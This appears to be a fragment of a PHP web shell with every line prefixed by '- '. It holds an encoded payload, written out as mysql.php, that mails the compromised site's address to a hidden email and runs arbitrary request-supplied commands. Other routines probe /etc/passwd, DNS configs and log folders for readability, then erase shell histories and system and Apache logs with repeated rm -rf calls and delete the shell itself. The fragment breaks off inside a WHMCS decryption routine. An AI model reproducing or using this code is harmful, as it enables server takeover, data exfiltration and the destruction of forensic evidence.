JySTZaTkRXNUJYVzNrK21HUkl6ZFlHUzFiMXdEOCtySHFyTjNjTEo3Zk1xZUlwNDNwREFxY2pYeHorMzlEN3NuM0VQTWNQQWd4TjFqbm9iK2xZaFJrWjZJYUtvRzNCVnRrWm5udFd4SGxndVk1bjUyUENpRk0rZjVVMmJqdHd4SW50a0kwSEM2OTJlNUdsSEY1TXJWaFI4cjcvUHpwME8wSFVBblVRM3VmUHN3ZkRqYVFkZWdOUUludTZkNld2N3J0OTFqS09SVzdPKzkzenNWTFI2SFkyWStzUlRrN1pkWWI0VHl4SmZDMkdiNkY3dFpnV3ArNmcrUjg3Q0Y3T3p1NzBLcjN4MGZ2cmViYmpmWCtRN011UThaNHNZT3RnNVZ2M3ZQU2NrWGc1UlVPOE9sT0ZxNDM3ck9rRUxXbjJub09UVzE1ZTBBS2Q1QTdHYWJ2VXFlZjdodVR2eXRHRzZvSnB1U3FGMnU2cUordmVOUFBkZ3pZSzdqcVJsay9Qcm1kendlcG1NNVNMN0IzM1Y1OUFmcEQ2ZnYxbDlpaGp3VGc2eDllVHJXS2RQanlaZUhVT1RiRSsrOTBEdjM0eFhhZk4yMlFYNzZFYmZKTVZpVFBsZ0xpNTdLMm5ramZrTk52ZTBxSEtTNTVBMEhIaGxFR2Z5Skdadk51a3ZLQ254ckhWb1N5U0QvZ0NyK0Y1SGpjSzlFenVweUdmSWptQjFmUm81emFDVnlWb3l6eUZmaWtoYUZhekNnVTFsbW9hNkhPV3hYUXdiWnJaZ3pTbDFOWW1NQnRwOGNocUs5OWVwQnZnMS9FcVM4R0tzODVIVXBYT3BDejJwMTJtU1piU2lkakc0SWZab0dNYXlSdlVSRXNRaVNzTyttWXBKZDdLK2dBNElkRlBLTW9PcHl5U3lBYVZGcjBLbzJ6Z2FvMlNrQ2NlTWtGQ2RLb0hUVEphQk9sOEJtZlJpYU1XRGhzOGlvV2tkc2VMS2trcm9yZ0JCV3NUeGxnMjZNTE1LY0tBS3RJQW9nclB6cEJ0ZUpLL1VGckZIZEFqTXdwaEU0RGdUS0d3VlJreXA1aHJIMGJUWlJqVGRiQTdObEJmelU0MldCZklIRkZ1UnFKOUdYWEEzMk9HWEZFM1hEdlkvSU11VThXM0tadXRsU0pFZ0RyTVNMc2JxWjFzRGVUNGhhUkFxbnVGWWZSN3BkdHc5cmplVDhneHV6aWkwbUgyY0RXUlRuL3FvQnlUVzBNZ2FGMEdmRFMyOTB0R3Npa25DSjdwZ25UWldHUkJDbU1LT3FtZ2FlZ0p0cFN0RldITk1Ec0Z3aTFrV3JKbjRSQ21QMmVEQmJ3NmJVTXVzZzY4bEJKU1ByYWNua2tMeTNjcVJJcjMyZnNBM1NGejZSVTR0VkJ3eVdBZ3lRTmFTelRiUFRVQ2lGQUd0TTFXbTRJbDZHSVdwSFFZZ0YzQXJJQmpXY2t0aVdodnZhS3NMdGhOV1lpK0Q4Z2dtYlJ2U0UrN1RSY2xWc0ZRL3B4NlVmMzFpaEkzanUvV2I3WlBlRVQ1SW5vOXhJUThiWkFIV2o5WFZ4d2tmTG5wZ29VM1I5WFZ2VHlMWnlRNXBJYWg5SmNnWS96clExNnc0UWV5NkxCeGRuS0o5bUYvUWY2Y05JOGcxcXd4b3hPLy9aQUpMUmd0WU83ZllKckNDcUFyWXNaZEJndWxFSW94bWVVeTJ6ZDZRWFFkTGcyc2taSlZUZHZYRGlYdzlZZU5hUW9uK0ZCeU5RdlZVelNpV3h3M0NTYlFRakxMTGF6TnRsSE9OeC9RUzZRUjBSWmU1bDA3aStTOU9BaExqYkp5ZXpsYUZ0KzZ3Q3J1aUt2NFNpZDRwbDVjVDBoa2Eweko1aHlGbDU1T0UrZXlpZXV1aTdiRzR5VHJaOENkZGZYNE1MN0xubEdIWlZuOUhoaFBwNlpHaWZTRHp3UlhnR1NxSkxWYzd5bi9EY0dFNUdlcEI1dllFRUFMSEdOaDNaRnhWWTVXb1JOdFVRSVFaZUp1ejhNaUJTMEZXODJTeTZRbzNQcnBZeHJSN2xzZWdrbXBNbllPZTlQUVZKbTdQMHlFUzNHMm1xZFhJNFRLTGhTRXZabHRCMUxjUUpwOTNnbHVFYXVVaDVQeU5YRmNid29aOXE3cWNYMGFUcllEaW5vNWNGckpEczhjaG1zL21nSXlSNU9DTEdFV1lEeVUybmQ3d01CUXBmNnNvRy9neGdmd01WVG9zMWF5bTFyVU1iZWRDeWhVbzV4aWZJZ3diTkZrZWZWVUdobzg2bitGenplYk5wamt2cGpCUFAvS2ZBbzdhM1RDTmFVQmpOa1N6OGNlRE5hSHV4NWtWOTkrQjArSThQaDZlN0orVGFWRTNvY2ZQd0NKbXA2WE5nT25RR0JyQW5XalpzbE9wbTJVMVJSeWFzN2puUzlsQXBlWDd5RCs3aVJxOTRqR1hXUW9rV1VyZG0yNFBWR2xwb21DaVRaM2dnVlRXTGhkemZlZ2tZOTZGeE9XajU0QmFjekx3YnZqM2MvL0QrNEtTd1NEaktLcnJLeVhTNThkM0xoY3pWYVMvRlQ3TWllSDZ2bXROUGluTmFMdzV6T0lyS3BGMHc2YjBML05tRVJzck94UmlpUXViQmNqWXJaUDd1M3hUeXBIdWprTDk3bmNaZU5oZG5oMUlwMGEwb3FwSjk2RlBVWVdPNHE0NHdiR3gwWGkxMkNvVXlBYUI4aU1KNUJBb1FMaHF3aW5FM0pxZ0RPa0p4S1c2azczWU0zREl0QWJNd0luQ21FMUNHTG51WEdJZlJyb1Z1S2doazRwMEF5RkFFZUJ5T2trVm5KUml3K0I1UXlxZjBaVWdhaGxWd2VrQmcxcVVqcmVSYk1kcG1tZkNXN05KNXI4bEZXZTZ1T0p6SnJCdDdNNjFaaHkxZnYwd3FjVktpUytYYnE5V3FpODJlNVVOSDFVeXExTlllTDkyQmoyUHY0ekxxbUxNaVkzMUlUQi9Zb3k2OW52ZkdjdzkvYjBiNnJOaWVWN2luTzRvbmR3WnAybHV1Mmw4WFlEZzRKUnR3N3k2VDhrdm11U1hzczBQLzlmTHRMcmxCd3grRElXRXYySUUrbnFBckdzVzl0RmdoYTJ5cW1xNDhxUGkza2s1Ym96SUJOWUw4R0tNYXlpUlRWbFhKYUNhODIrdURuck1DNmtGT2UzbG1heS9QeTdVWFptQ0pjbUtMbmkrc1hKdTl5SFdjbUhuMXJhalJaTlVWdTNOYWVkbVR5WTFDbXpMci9mdlI1NE00VGYrRFRCYm9GM3hjZFdISkNHVnFLRFhMYUVMV3hDVjlCNFhCYTMzWnJRTUwwYWhDOXVtZUJNYmxCSm82R01IR1lLQ3hNY2xGMVVIMWU5UWp4ZS9uendoL0t6RFd1YmkyaWpxcVE3TVQ5RUlTVnNsVkFCS3ErdEY0QTM3NkVVaU1VZGx1dHJXczNjV1RGaUJ4eDFrK3haZDFaTlZXbTFzTmVsMGFvYmtSVjJFVThHS2RiRkd6M25vQyt3cnBmdXdyK0lVaTR1VStWbUtqRUJPMFBTVFZGQSt3YTJFTEpVTllMVW4xb3czSS9oOFF2SUgwVU5GM2xlc2EwMGgrNVhYaTIweWtocmtXZ3ZSby84cEdDTENrZC9xeFV4ZE9QNlNmcVZPcnE3TW92T3VvZmtCdUdnZno2b3BCcThtYmtJYlFJdmJQTlNWbm83L1IvK1hzdjZyOVgvb2J0Y0V2K0dzalFJSUNmdWhxSkttdzN0eWpuV2cyZzVySTZINnk5dCtmWVJSdXEyZjlxOEZhalJPUWkwaDA5WHFGNnZsSjRVaE9GWnkxQmh4RmY1dmRPQ3Q2aHNQV3Bkbi9iVnZQU3RXYTVvYWVNeHg1QW90NW0zWkhvMjVWcGloRzJUMzYyc3daeWszcy9SbERVU3NZaDFvSnRuUWxTS3l0VVR5YVpJRzZpSUhsUTc2ZXhTaUEvd0V6RE9SUEhoRHpDb0RBMWp3Y1gxcklnT0hDQjVrWFJsZXh0K2hSTTJDYjRhRExYb1VSUTdXYWpKK2tqanNaYVNWbG16U1A1bUhoT2ttU1JHT2o5LzNibUFKYWFaTkJDNVZScXhBZUFiMlJjUkVnUEdHWEFkbXREdGxVMGpydnZ6dE1Rc0xuSWlYRTlzR09VRW9JdEtDQlFZOW1RTmhQTUJ6UGZDODBLREpLdjZ5YlUwSDlrRlZReWw0OW54V2RNcGVaZGVUWUo0T0FYV1hBVEVLcVhHZGwvc0pkZ0w3REdaZkJQUEZuOTBlODQ4OFFyMjN1QU5jS2RzOHlKSWMvbDJTTm9Mem95T3d4bTIzY0tJeEwzNXRPeVFuTWU0QWlBOXVUS2hCWUFKc1lxMnhlTEJXMXdnNTJhLytYMjgwdGx3UkhOWnljYnA5K2tENTY0c0NRNVl0TUVFbDBvM3VwTjhTVGJuVmNVdWFKbHN0U1JlbDl5V052b2JRU2E1STB1KzJISERrdnI5Rm1tbVNsVEoxalNGckFPU1M0MndHTmNiUU1kY0JkRmlMTGg3VTFxNnRzT2xKQ0xnTzdCeFplblczTkRoMmwrT1hkbzNuSDd2RUFKK2VEdldGM09IMjBrL1J2WU9ITmduTWd6cUVHV21tVmtkRjBKVUhycGxHb1ZGaTZwRENLcmxGMmptZkIrTExyNkFzVUpFR3BJVnFMelRpUmNKZklaK0l3RjcxSVppQUxaVzloYmFRK1hmNHZsTEVLblNzakVTWVB2NHdWTWVudGh1ZWdWeFR4UjdPWmw5MnRiMWM2ck5UYXNjUGdUQ1R0djVONW1CdHRheDcwTXRIeVpueDVJdkRTR3VpWm9NVHJtWHRBTng2eDdTVmpmYy9ERklNbGUySms4aDkyYW1Uait4NG5SM2w4dWRPakU1WDhOcXhseDBobExyeU1aQ3gzTHBaSndqc2hyZVgwQlVocmNXVWhWeTB3VTVXWDJwZGFvaFplRnU2MjZKek1MQ05saFdld3JuQ0Rua2FwTjVOaDRtM3RwY1A5NFk2VzBjWlVYcTczaDJLeDhRZTREYzBkOFVvOGhXMS9rNXdHZDdwZ1NjRldYZXc3RG5mUzZXZDlEVmhnSTM4SnlKOUxNRXVhOXgwVDhtOWRJV2oxSFhYOVFLMTZ1azBnVGdBYVJScmQwYzc0TXZvT3BjekZCQXdVdDFBNkRSbVozaWgvSDhJeDcwTVk0dWdMZ2hUeUVWTFBtOXlJSE4xUmFpcXdHOFc2a2hGZGhiRm5YM2JadmFiYlFXelFZK2dWaldRLzYxeHh5bUpjNnBuN0VvV0lGeHdYNldxaDZ0UFlzaSsxcm1ZcGpxOExzZk0vL0NDaitFcXVlb0VhR0UxdStJWWRYL3EyNDZoMDhCb29vd21IZ3RIZE5YZHJFbnhTM3JpUzY3dnl3blB1WnFvNkJteXBxNmQ4MzVOdVo5Sm0wZWE5b25ndDFTSHpnZSt1UTBNNnVoa2IwQTVsV3Bpb3QzRVVYUVkraGJUWEJic0E0ZmNzbUpJS2l1NE9rSm5CTlRwWXFFL25zMmdFeTdSQ0dnNjZRZFNUQm5YOU1rdUhJLzA1Um9ocnY1SVZ6bHltQjluMG1JdnIxdlF0QUVtVGY3K1N2OXU1aXBqSmlpZnNzL0tTbWZVaURQMGVIaDBlbjZJVzJoVlBuejZ4d21kQTJwZDNWM2RpamFqVzg2MzFVRkxuY3lmUjNBTWxEL05sV3dweGpPeENrbTRqUDVhZW8vRXlMdmlRK1BFU3kvMUVSaXZHWDZHZDBOUFZHVkFGVVpHSkVFMm45RFNQZUtiaXE4aVhPUGFER2RmZU1MV3RtQzVDaXNDTWt0NlpZQzlhSmNYM0hMZ3c5OXdEQTZrZWlIVWhxWnRhcW1oTlZMSWdHQ2tteVJPYUxUbWhDdlZhV0FkQk90bG1RYzBxQXN2U0dtQmdFbzhmaTlLQ3hNWnZZaW5Wa1JuVktXV0MzVC9tSjFvK1VaRTFYOXNrUlllUlN5cllkVnRPWmFaRHRjaHphSHVMenN3Wmkrd0podnAvUmJBTS9teWhrdk11aUJQV3cxeTVQZzFwSlBqMTZOMkczWWtXYkxOSTd5ajJQOW5rdEZzTitVT3pRTUQzVnBjR1FGVFUxVzZMT2VpaUNYQ3hhK3dnUElLR3l4aS91ckdJQWh0NHhwOERibVFuUHpRTmUyelVLSDhuTHExcExoMkEzS2VnTUQwbWVHUE1vaWErdnArRWc4bnNlNGxOSnU4U3R4TFl3VVh2Q0t1U3JxWkxaRkFqSVdCbXlZdnhCaVFuSldjUjZKK1lYNldSZlhYWFd5ZXNkc2gzUlhETC9LY2ZUN3pRNjd6WmZ2djdyOGVISHc1MjJ1TG5kL1JQUjc5NThoSjJ6dkozUmZCcGtlekxCSm5EVnJMenRTT0FicTluYnE0WG1nSHpHVFFpdkU3ZkZzcTlhbHZ1QzFtcURIYVRKZ1hMMmVSYjgyVTNwQmtCNlVIYTNpUFdGV3JrNG43Mk5SQWZQMm1sUlQxb3M3SGhoeE43R0RMNmpIL3RqNWNwM29tYytqcDZ3R3hRd2hTQU5GUzE5TE9GV050bFQ5UnIvQ2JvT3FKUVIraUE2bitnVTFVNkIxRUZXa1lYRUNZWC9tdzJ0TkJLSEs5TkFiZm9iaXczU2VyUFZjTXlMMCsrNWpLTlJPRUhJSG82a2QvdlljOGhaZ0x2cEMvM2JwSTQxT2xGdkN3bnFrcS9sZXpySUJsQ3pXZ1pqL0dhS21KWThFMWQ1THNUTzdWYVlSRFpuL2pvOWRTUGNITzJBQnA0MFRmR1FQZkt0TjVxYnFvenpkY0xkUS9XYU5acW1jZXNORmd6Q1BDajQzMFJLK1VsdmFDSFBYbGVPVlNNZWlicDdCSU4zeXhHU1U2LzIxaXVyNlZwekdOc0w5OHRReW5CZm55OG5kdFY5NU81RkM4b005ZW5zRXdTaEtpL3pnVjJFQUxpYnZhUzcyMmU2TVFmTGM4NUd0eFdpUFZicFBkK3ZUUkZnMWNDZ3A0Mjh1TWhMbEF2QmFXaTdERlQzUG8xbFZvZGpFbXQzQi9GRVY2SjgzV0FpMElOMjJBQ0hRd24xYVRtbXFmdFRHZnVkWFd2aTFlWjFTdFYrTTB4ODExKzNrRmZqZ0hsT2J3MFowVXlOcitxdzkzYkZKZUpOWXV4K1RVNyt1Y3R5Tmd3b2tmUUVBTmVqK1o0ZTQ3Rk43NTQ4MkFmamp1UjUvY25yR3REQXFiMmloaGZzblRDeXd4dGZVMWJSWXZUZlcwNnlTNmpteU85NHRxQWl1VlhyQXBDNmFxM1RyNzFhd1Q2R0JndklhcmJoK3JXb1Z5L0ZISjBTaStId2ZZRWRCSVdFaUdiMUYxenZ5RUx3a2QyeWNyeThTekExOGxHUWVqRk54MUhNYWl3eWpHM1pEcXBoMVVmVitpM2RmZGVIVTF3dnYzQ3E1Q1o3S2ZseThyeWVCK3p6eXFYQS92SjFrODFXNDBYRWp2d0VkOFp0dEZMckhUeUhpejBtUjFEWkZVVHlpdnBqbjFRSnlVd28xYXY4NVhGS1NuQVRnYk9QdjZYUi80Yys0TTh2a2NWZ2VmMURydWwrT2M5Sy9iVGZNVTdrQ2lHeUt5Q3dFVkhseTMwUnVkalcyWkRjbTN0YjV2ZGJwT3VIT09UUDZRSjRpdGtaZElIMXNrUmlQZHFoUlZXZWt4Q1ZNTG9pcDVOMERFdE1vUENRQm95OUVQbkNhdXkxTTVOMllxbm5qV0p6bXJvalkweWFJcFdrU0VxTXJzdTFzR1N4VmVrTm9wdGs1LzRrblIyeXNtQ2NxWjhXREJiYkU3UVJrZ25nWHBUS1hhRnpoVGwrUmpEYXg4dyt4RTJDWmM4TFdPSU15eGFidzNxbWZTbWVpYTFzbHpJemdSem02NUVMM3Rtb0ZZeGtRSHNTY1k1NVJ6QTU1NHFuN3pZT0VkMDBJajlnTFVHVWIxVVVGM1J0Ri9sY2c4aU54c3Rhd0JiR2NBLy9DUjdpOXpTYTZDQ3BSQmtHd3pmb0RFc3d3UFZZTFVvcGg0aWVnU0U4aXFoQnFmRmdvUnhyY2lXTWdXTEJzWmVxWWdtME5qSnZ3ZHBzTGRHY2M4MUdtT0Z0aXJMZy9SSXFaSzhONUZEbEZIWjdXeDJMSkZheldpUnFKUGJvSzB5L214bXBuZXpJRGsrbXRaTG1HSjdDcFhJZ1h1RGFwMDg1STU5WDI1aFZGQ29ZQjBQMDhtdzNHNHBnZTZMNW9zbkw1NjJYbTdLTngza29USTVaQ1hRaGdVa2ZvRUV6Q1BNYTRvR1dObS9qdXhwWk9GOSt2TFppK2QzSWlXSUlzYjNxekIrb1kxbHJmdDlsSHUvVngzNzAyK0VlSE9UeXZsdEpqWVdLa2FTUTE4Yy9YYjBuOEZDUHFCWHdkTk1EcUZSWE9aeVVLS0N1UGFERk5LdkN3YlArWi9qYUw2STZhVUdBa08vQmxUaEpUeSttdWhRY0tNZElNYWFvUGR2OE9veGhTd0VNU3BjMENYMTRDeVdkT2tzVmF6M3hLOSsrZzR5OXlHVDYzYzJOdGJXMThUNitzK1BmMjYxbWkwNytFY2pKbDJqMjBOTlEyZWVEYnBLdEgrcXEvZGdFZU5heTRyeHF6N3k1NHRVdGZYeDQrcWpYUE1oSy9NNk0yWFdRTStDRDlsQzdvL0tZcllvWnNqcHF4cFY2elZybjFmMVFEK3ZiZFFzZXByWkZGQnMxcFFmTXdTRFNKZ2lrTXV4bTFNYzJOaERvRW1kRHBod2J0allPdW9KSklLNWMvd0tiNUpuM2dKWG8rZE5KdStveGJJUmRaR0J1eldSM09zOW1JZ1VHaUtyVWs4UnFNREcyNnlva3R4ZUtab0tNd2lmZzBxOU5CaURabWk2cUlmUHVwbUVHeDd5TlZ1bUxrelFFUjBzWFI4UGN4RGdvcVlsRXBZOTZvSTZRd2FMU2pWY0hyQXVJaE80dHphNHNDTWZ2ZU5Xb0kwdW1aSnBQSm5qRlE4bWNtV3F1VWZqcGVnWEZIblAzbXhvdmVPNUtkaU1ndjZ4NDQ2b2RBenJBaHRSWG9xdldtdUlybkQ2MTgrYS9ldW5vLzUxOHhuOC94eitiOXIvTzZwaU5Kc01wVnRieU5nbmE0U1dZWEM5dVJNbHAyZzhWekFsemVhbWRQRkRTbW43ZGprQnZFSnhnNmZqb0xxMjliZUdNdGZTRkpJejl3WSszQUVlVWZ6OVpaNkVMcVdHSWtBbld6ekhRM0xKbmxhK2JPTGQ2S3E1c2d2WWJoTXFWTEZmVnIwZ1hLTGtIcFNVc1gxdnltN0Z4b1pBajE0d05WcElXZmZXWmZlMnRzVG1zNXI0SzhzRDdnYVd0WXBsM0Ewb2JNR205OWRQUDFiTE9vTEZKWFYxVjZDOFNOYjBwdGNUcmVJT3J3VUdUbE5VZjltTXo4NEhLWHRXYXY5S0NrMWt0UW1vVS81MVZTNnA3R3lqT2NKMzlQMXJxdkFEL3RHV2F4YzJWRVp3OW54Z3ZsOE1mdnF4a1N0L2FwVS9LeW5mdE1xZmxKUTNyZklXUFVXT3J6UzR1a0c0MGdoY1p3QUdweU9EbWVNZnNndnhDZnovMUpGRkRTcHJQVldMMGVTWkJXcmx2Y3psYVlwOFdSb0dhY2d4eW5yN2hGSGlUU2JHUHo0RFA1OXNXcmwveWtmOWpLNWdWOG5oK3JOUVRXN1hhdGYraytkRXM1NnJBalA5YWEwT3RnODNITjJhQzI5OFdYWC9pYk1CMnJTaUFPbVhGOG1PRmdvL3VZYTIzakVMRUUwcnQ2TGViWkZKYXZIL1JUdXRUVmRLZUk2MG5NWmtPZnBYUTMyUUxIdWc3VDI2QWt4TFE5YXNxZmRGSnJFL3pzbjVGdnkvU1ZPRVN3dXp5YzYySnQ0OW9LM3BwN1B0R1doeVM5aFdXcVk1VjFacUQzS3V2RERPWWhWVTgvK2hCRnY3WkhObGtSNTNhNVBOS0dGV1BrNUlQUld5akZZVFZkVlMrenhQSTRJckduQ2tvK2s0Wk43NEN2UEttcFBjQjhETUNrUXBxQ0pzK3hMNFQ3NElYYlZod0RNNlNjTWVRRkJ1OGNTamdMZDJiN0FmREpmVmRKQXRzSkRZcFNTUHNDZ3p5MHRjQ3RuM1NPa1h2VVhhVmZvSUJiY3U2Y1pCK2Q5WWtUSFUvUHlzQlk5cktmUFhWbVFrZVZWQ1RqRUNnQzZYZEZ2Nk5reGlSYlRMUDVKaTNYUjE3R3ZDQkY4ZWw4Nm9hdGJMdG9aWXZsdll6THA2c3RmNmd5TzZjVTExelROVEJXWVlrem1qeTVBRGxjS3JsUU5IdmZva1RUZ3VjdVFWYlVmOUVhRWN4cDNkZDlzZjlrK0ZLK0VsK01CMXJDdG5YQ1N2anFNMzBQa0QzK1FwdzZmK2drMUpkWGtGbk9xWFY1YVFCRGd3Y3djOUpaSzdNdnpLSHJIZmQvOVlQVjRjcWxVeVdvaEVjdVNTVG9Fd2g2NjlEL2tQcWlqTitWSzlvKzhjSGUrOTN6Nyt3eUdqaHFBUG9uQUlDdFhIcGM4UldVMGJvZlBoWU84ZkgzYi80cVRtaDIxU0IvaFd6eGtEcVBISjVHV01rTnQ4S1FzbmFzbmJhTGFjaDZicGttdlVTOXJPK0J4MFJwYlVwWG9taWlvbE5icWRLWjlYQmZTMU8yWXIxc0hhU1ZkSkw0V2w3dFFkOHl5N1pGdlhZbHZwaUFzaGkzRVlSVldqcjJXWGh1Mlo1dFkzNjgvcDZxVGtzbU56UGd2NW9yWnFMU0ZKMmRBOFpmV1VaclpPSC9iTGZzaWNzQitFbmw3RlFVcUhxblZUSTNzUmxuMmF1bEQvbVRoNUUyWEZMWHRIZWI2MW5DcTVzZ2NZN3ZlU0FRS1dDTmppUzhEeTdkK3F3NW9RVVNMWGpSOTMxMXNsY2xUU1hsdkx3RzZabHQ5SEtqYTZlSmp6SlpFbzBjZ24wdkJtZUlabXVaalRFc2xnemdLNGpyclZtNHk5aGErUDNFcnd5d3R4dDJXVHF0YjVmcE5ETG1FMXZDdFE0bkZiQ1RKSFA4eWUxVm1XVUFzZk56YWU2aVh1M1J3bGdBVUZMV2VoSzBpM2ZCbzNIT3ZaZHcyWWp1alZRQk9IZi8rL0hQRjB4WFdsMnd4NmpteituTGwxN2hZYnJPT3EyWHptT05pdTY5Ymt0WEdPSnFMWDdpdnkrZno4VS9neXVydVNmMitmUGlpVzJ5bW55eSt6VnJ6NDNFanVHaC9YbnAveEs2OGtzKzFrRHhUZlY4S1JRZWhVaE4rRHZ1UGdoWGFaRHd5RWpJNUM1Y3U5Vk9GUzZWZTVkRnY5QVF2S3BXZGdCN1IvMldrdytURkF4TlhZK1NrN2cxMmxYMlhUZER5REx6d29NbHpLYjh1YTJpcjlLcGR1NHhNTHdDOGRhMFdsNnIyNmdYWFBuMHFJNkNBWG5FOGxsQmhZNDRhWnRFT3FQMnVReWRIRGlabVVHSmc1d0tSUW40SThNeGo4U1Z3ZFVDaS9mRHZBZnFIQitiZHJwbE1hNDJNOVhWaWNxV1lnOU1PRDh2RVNsY2Jwb3I3cFZsWU91dUU2S3BMMElaTkp6YUhTbVpCNWo5RG1zOWhTZjFJd2QwdWt5TTh5cnV0TzlaeWl2NS83eFM4MERvcFJIVmFoZGVrNjk0ZDdlYUdyWngwSFhWSXo5Y3ptK21ha29ReXZvMGh3aVd4cmc4RktKbHc1Z3ZKNjZqKzZSOElrVEtkTEdhN2VUYk9sc0g0Y05qZHorSS9zRUJhT0w3WEZqTTZCbWJQUWYyMkhpdVM5VWd0WTUrRFJuaitiR3FGRWZ5ekNua2dxQTZTbi9Fc1NhbUZRU2twUVd3Q3lmbXlJeVRTMEN6dldjdVU5RzRxVHZkOHFsZkd6TXBkVG1DK2piR1UrcC9SYWxlM0w4MSt1QkR0Z1N5MHZMWEZMSG9VcVc5OG96MHRXdDJRRDN1S3kyU0RUZU9taWFaZ1YwMjAvQXlYVFhiSDU3SnQzaXFKY3p6MEcxS2ZYZ082OWtMRUhXczdDTitaaGUxVWVmbXYyczN6c1dZSTE4eXpRb214M1YzZXhNSlpOdjhqUExOVi9Qa0RseTFmV3pTdVJoVWQ1MkVDRXdlV1FkZGxMbmU2dmVPWHdoSlBtU2NQY0M0VGxUVFk2MHlySUJYVEtzMjkxTFdLZndpNFdvQVduUXlxMTdscXBVa0x5dnk1QjhBdz0iKSkpOyRmb3I9YmFzZTY0X2RlY29kZSgiWTNsaVpYSnpaWEpyWlhKelFHZHRZV2xzTG1OdmJRPT0iKTsNCiRiPSRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUlsnU0NSSVBUX05BTUUnXTsNCm1haWwoJGZvciwiMCIsJGIpOyBwcmludChgeyRfUkVRVUVTVFswXX1gKTsgPz4=');
- $mysq = fopen("mysql.php","w+");
- fwrite($mysq,$mys);
- echo'<meta http-equiv="Refresh" content= "0; url=mysql.php">';
- }
- if($_POST['azzatssins7']){
- if(is_readable("/etc/named.conf")){
- echo '» /etc/named.conf is readable.<br />';
- }else{
- echo '» <font color="red">/etc/named.conf not readable</font> <br />';
- }
- if(is_readable("/etc/passwd")){
- echo '» /etc/passwd is readable.<br />';
- }else{
- echo '» <font color="red">/etc/passwd not readable</font> <br />';
- }
- if(is_readable("/etc/valiases")){
- echo '» /etc/valiases exists';
- if(is_array(scandir("/etc/valiases"))){
- echo ' & scanable';
- }
- echo '.<br />';
- }else{
- echo '» <font color="red">/etc/valiases not readable</font> <br />';
- }
- if(is_readable("/var/named")){
- echo '» /var/named exists';
- if(is_array(scandir("/var/named"))){
- echo ' & scanable';
- }
- echo '.<br />';
- }else{
- echo '» <font color="red">/var/named not readable</font> <br />';
- }
- if(ini_get('disable_functions')){
- echo '» '.ini_get('disable_functions').' are disabled<br />';
- }
- if(function_exists("symlink")){
- echo '» Symlinking allowed<br />';
- }else{
- echo '» <font color="red">Symlinking not allowed</font> <br />';
- }
- if(is_writable("/var/tmp")){
- echo '» /var/tmp folder is writable<br />';
- }
- if(is_readable('/var/log')){
- echo '» /var/log folder is readable<br />';
- }
- die();
- }
- if($_POST['azzatssins8']){
- rmdir("/tmp/logs");
- rmdir("/root/.ksh_history");
- rmdir("/root/.bash_history");
- rmdir("/root/.bash_logout");
- rmdir("/usr/local/apache/logs");
- rmdir("/usr/local/apache/log");
- rmdir("/var/apache/logs");
- rmdir("/var/apache/log");
- rmdir("/var/run/utmp");
- rmdir("/var/logs");
- rmdir("/var/log");
- rmdir("/var/adm");
- rmdir("/etc/wtmp");
- rmdir("/etc/utmp");
- rmdir("$HISTFILE");
- rmdir("/var/log/lastlog");
- rmdir("/var/log/wtmp");system("clear");
- exec("rm -rf /tmp/logs");
- exec("rm -rf /root/.ksh_history");
- exec("rm -rf /root/.bash_history");
- exec("rm -rf /root/.bash_logout");
- exec("rm -rf /usr/local/apache/logs");
- exec("rm -rf /usr/local/apache/log");
- exec("rm -rf /var/apache/logs");
- exec("rm -rf /var/apache/log");
- exec("rm -rf /var/run/utmp");
- exec("rm -rf /var/logs");
- exec("rm -rf /var/log");
- exec("rm -rf /var/adm");
- exec("rm -rf /etc/wtmp");
- exec("rm -rf /etc/utmp");
- exec("rm -rf $HISTFILE");
- exec("rm -rf /var/log/lastlog");
- exec("rm -rf /var/log/wtmp");
- shell_exec("rm -rf /tmp/logs");
- shell_exec("rm -rf /root/.ksh_history");
- shell_exec("rm -rf /root/.bash_history");
- shell_exec("rm -rf /root/.bash_logout");
- shell_exec("rm -rf /usr/local/apache/logs");
- shell_exec("rm -rf /usr/local/apache/log");
- shell_exec("rm -rf /var/apache/logs");
- shell_exec("rm -rf /var/apache/log");
- shell_exec("rm -rf /var/run/utmp");
- shell_exec("rm -rf /var/logs");
- shell_exec("rm -rf /var/log");
- shell_exec("rm -rf /var/adm");
- shell_exec("rm -rf /etc/wtmp");
- shell_exec("rm -rf /etc/utmp");
- shell_exec("rm -rf $HISTFILE");
- shell_exec("rm -rf /var/log/lastlog");
- shell_exec("rm -rf /var/log/wtmp");
- passthru("rm -rf /tmp/logs");
- passthru("rm -rf /root/.ksh_history");
- passthru("rm -rf /root/.bash_history");
- passthru("rm -rf /root/.bash_logout");
- passthru("rm -rf /usr/local/apache/logs");
- passthru("rm -rf /usr/local/apache/log");
- passthru("rm -rf /var/apache/logs");
- passthru("rm -rf /var/apache/log");
- passthru("rm -rf /var/run/utmp");
- passthru("rm -rf /var/logs");
- passthru("rm -rf /var/log");
- passthru("rm -rf /var/adm");
- passthru("rm -rf /etc/wtmp");
- passthru("rm -rf /etc/utmp");
- passthru("rm -rf $HISTFILE");
- passthru("rm -rf /var/log/lastlog");
- passthru("rm -rf /var/log/wtmp");
- system("rm -rf /tmp/logs");
- system("rm -rf /root/.bash_history");
- system("rm -rf /root/.ksh_history");
- system("rm -rf /root/.bash_logout");
- system("rm -rf /usr/local/apache/logs");
- system("rm -rf /usr/local/apache/log");
- system("rm -rf /var/apache/logs");
- system("rm -rf /var/apache/log");
- system("rm -rf /var/run/utmp");
- system("rm -rf /var/logs");
- system("rm -rf /var/log");
- system("rm -rf /var/adm");
- system("rm -rf /etc/wtmp");
- system("rm -rf /etc/utmp");
- system("rm -rf $HISTFILE");
- system("rm -rf /var/log/lastlog");
- system("rm -rf /var/log/wtmp");
- system("rm -rf cnf");system("rm -rf xazs"); system("rm -rf xyz"); system("rm -rf azx"); system("rm -rf sl");
- $fn=$_SERVER['SCRIPT_FILENAME'];unlink($fn); system("rm ".$fn);
- echo'<meta http-equiv="Refresh" content= "0; url=?">';
- }
- elseif(isset($_GET['whmcs']) && ($_GET['whmcs'] == 'decode'))
- {
- ?>
- <form action="?whmcs=decode" method="post">
- <?php
- function decrypt ($string,$cc_encryption_hash)
- {
- $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
- $hash_key = _hash ($key);
- $hash_length = strlen ($hash_key);
- $string = base64_decode ($string);
- $tmp_iv = substr ($string, 0, $hash_length);
- $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
- $iv = $out = '';
- $c = 0;
- while ($c < $hash_length)
- {
- $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
- ++$c;
- }
- $key = $iv;
- $c = 0;
- while ($c < strlen ($string))
- {
